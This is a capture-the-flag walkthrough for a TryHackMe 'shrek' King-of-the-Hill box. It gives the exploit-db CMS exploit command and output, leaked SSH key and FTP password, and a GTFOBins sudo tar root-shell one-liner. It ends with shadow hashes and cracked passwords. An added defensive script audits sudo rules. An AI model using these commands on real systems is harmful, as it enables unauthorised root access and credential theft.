shrek KOTH

SSH private key:

After enumerating I found a robots.txt file hosted at the webserver root on port 80.

http://shrek.thm/Cpxtpt2hWCee9VFa.txt

ssh shrek@shrek.thm -i <KeyFile>



CMS exploit:

Exploit found on exploit-db.com

https://www.exploit-db.com/exploits/46635

python exploit.py -u http://shrek.thm/cms -w ../../../../wordlist/rockyou.txt
[+] Salt for password found: 1e1b72555eb91948
[+] Username found: shrek
[+] Email found: shrek@tryhackme.com
[+] Password found: 1733c648b88ea8d8f3a66044db28d553

The password got me nowhere though, maybe you will find it useful …

So for me it was a dead end 😭



However we still have an entry point with the ssh private key.
After a bit of research I found that donkey’s password was written in a message.txt file located in the ftp folder (/var/ftp).

Now we have 2 users but only one with a password.

shrek with the ssh private key
donkey : J5rURvCa8DyTg3vR

Let’s now connect as donkey with ssh, then check the obvious command:

sudo -l

Turns out there is a program that we can run as sudo, tar.
We will use the command from https://gtfobins.github.io/ :

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Finally we have root access 😃
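
From the defender's side, a sudo rule like the one used above is what a host audit should catch. The following is an added example, not part of the original writeup: a Python check that parses sudo -l output and flags rules granting binaries with a known shell escape. The sudo -l text and the subset of binaries are constructed for illustration.

```python
import re

# Illustrative subset of binaries that GTFOBins documents with a sudo shell
# escape. The subset is this example's assumption, not a complete list.
ESCAPE_CAPABLE = {"tar", "find", "vim", "less", "awk", "man"}

# Constructed `sudo -l` output (not captured from the shrek box).
SAMPLE_SUDO_L = """\
Matching Defaults entries for donkey on shrek:
    env_reset, mail_badpass

User donkey may run the following commands on shrek:
    (ALL) NOPASSWD: /bin/tar
    (root) /sbin/reboot, /usr/bin/find
    (www-data) /usr/bin/vim
"""

# One rule line: "(runas[:group]) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(text):
    """Return (binary, runas_user, nopasswd) for every risky sudo rule."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",") if c.strip()):
            # Bare ALL means any command; otherwise compare the basename.
            binary = cmd if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
            if binary == "ALL" or binary in ESCAPE_CAPABLE:
                findings.append((binary, runas, nopasswd))
    return findings

if __name__ == "__main__":
    for binary, runas, nopasswd in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"review: {binary} as {runas}" + (" without password" if nopasswd else ""))
```

Each finding is a rule to remove or replace with a narrowly scoped wrapper script, since a binary that can spawn a shell gives the full privileges of the run-as user.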

Then to finish up I tried bruteforcing some of the password hashes found in the /etc/shadow file and got these results:

hashes:

$6$b9fPcfjf$hcqCL17XbSLt6YmsQL9T1nbQVh.4qVA7aKN9bYkKuLJtvMn5eHjpOLU502d71HktxqHmCK5NZoi9Y2s26ipiU.

shrek : 12345678

$6$UKHS9n/K$VQzDqsj.6rTfYDO7pT0czxuJ3.dK/WMntYwrrpDz83l70AGddwTepQy/.mQOSMUdUWbH1t8h930e7JNjZX/1T.

donkey : J5rURvCa8DyTg3vR

Thanks for reading 😉